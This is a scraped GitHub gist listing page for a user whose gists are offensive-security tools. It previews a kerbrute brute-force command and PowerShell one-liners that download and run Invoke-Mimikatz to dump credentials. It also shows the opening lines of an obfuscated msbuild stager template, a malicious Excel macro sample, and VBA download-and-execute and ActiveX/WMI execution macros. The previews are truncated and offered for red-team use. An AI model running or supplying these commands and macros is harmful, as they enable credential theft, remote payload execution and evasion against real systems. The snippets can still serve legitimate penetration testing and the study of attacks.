With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module:
JPMonglis
JPMonglis
/ kerberos_attacks_cheatsheet.md
Created
November 18, 2019 18:58
— forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks
JPMonglis
/ DevOOPS: Attacks And Defenses For DevOps Toolchains Talk Links
Created
April 23, 2019 06:27
— forked from carnal0wnage/DevOOPS: Attacks And Defenses For DevOps Toolchains Talk Links
Links from Chris Gates/Ken Johnson DevOOPS RSA 17 presentation
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| RSA 2017 DevOOPS: Attacks And Defenses For DevOps Toolchains Talk Links SessionID: HTA-W02 | |
| https://www.slideshare.net/chrisgates/devoops-attacks-and-defenses-for-devops-toolchains | |
| Recording of talk from CERN | |
| https://indico.cern.ch/event/622483/ (click the recording button) | |
| Past talks: | |
| http://www.slideshare.net/KenJohnson61/aws-surival-guide |
JPMonglis
/ RedTeam_CheatSheet.ps1
Created
April 23, 2019 06:27
— forked from m8sec/RedTeam_CheatSheet.ps1
Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Invoke-Mimikatz: Dump credentials from memory | |
| powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds" | |
| # Import Invoke-Mimikatz | |
| powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1')" | |
| # Invoke-MassMimikatz: Use to dump creds on remote host [replace $env:computername with target server name(s)] | |
| powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PewPewPew/Invoke-MassMimikatz.ps1');'$env:COMPUTERNAME'|Invoke-MassMimikatz -Verbose" | |
| # Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command] |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Compress-Data | |
| { | |
| <# | |
| .Synopsis | |
| Compresses data | |
| .Description | |
| Compresses data into a GZipStream | |
| .Link | |
| Expand-Data | |
| .Link |
JPMonglis
/ template.txt
Last active
July 16, 2021 21:25
msbuild stager template accepting powershell, compressed in gzip
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
| <!-- Pass xml to msbuild for compile and execution --> | |
| <!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild filepath\filename.xlm --> | |
| <!-- Configure AssemblyFile and pok for that to work --> | |
| <Target Name="34rfas"> | |
| <QWEridxnaPO /> | |
| </Target> | |
| <UsingTask | |
| TaskName="QWEridxnaPO" | |
| TaskFactory="CodeTaskFactory" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| //sample: 1554e74b935a61d446cb634f80d7d1e200e864bc | |
| //posted by @JohnLaTwC | |
| // Also see research by Sudeep Singh, Yin Hong Chang @ https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html | |
| ----------------------------------------------- macro ---------------------------------- | |
| Private Sub Workbook_Open() | |
| Call doom_Init | |
| Call doom_ShowHideSheets | |
| End Sub |
JPMonglis
/ macromal.txt
Created
March 11, 2019 23:24
Macro malware that retrieves the OS (Windows or OSX) and executes the appropriate payload
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 'get OS, if nt else if OS X | |
| Private Declare PtrSafe Function system Lib "libc.dylib" (ByVal command As String) As Long | |
| ' A Base64 Encoder/Decoder. | |
| ' | |
| ' This module is used to encode and decode data in Base64 format as described in RFC 1521. | |
| ' | |
| ' Home page: www.source-code.biz. | |
| ' License: GNU/LGPL (www.gnu.org/licenses/lgpl.html). | |
| ' Copyright 2007: Christian d'Heureuse, Inventec Informatik AG, Switzerland. |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Function CSV_Import(strFile) | |
| Dim ws As Worksheet | |
| Set ws = ActiveWorkbook.Sheets("Sheet1") | |
| With ws.QueryTables.Add(Connection:="TEXT;" & strFile, Destination:=ws.Range("A1")) | |
| .TextFileParseType = xlDelimited | |
| .TextFileCommaDelimiter = True | |
| .Refresh | |
| End With | |
| ActiveWorkbook.Saved = True | |
| End Function |
JPMonglis
/ classicTwist.txt
Created
March 11, 2019 23:21
The classic download and execute macro, with a twist
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Sub DownloadAndExec() | |
| Dim xHttp: Set xHttp = CreateObject("Microsoft.XMLHTTP") | |
| Dim bStrm: Set bStrm = CreateObject("Adodb.Stream") | |
| xHttp.Open "GET", "https://trusted.domain/encoded.crt", False | |
| xHttp.Send | |
| With bStrm | |
| .Type = 1 '//binary | |
| .Open |
JPMonglis
/ macroActiveX.txt
Created
March 11, 2019 23:18
Macro leveraging ActiveX controls (for code execution) and WMI Scripting Library
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Sub InkEdit1_GotFocus() | |
| Debugging | |
| End Sub | |
| Public Function Debugging() As Variant | |
| Const HIDDEN_WINDOW = 0 | |
| strComputer = "." | |
| Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2") | |
| Set objStartup = objWMIService.Get("Win32_ProcessStartup") | |
| Set objConfig = objStartup.SpawnInstance_ |
NewerOlder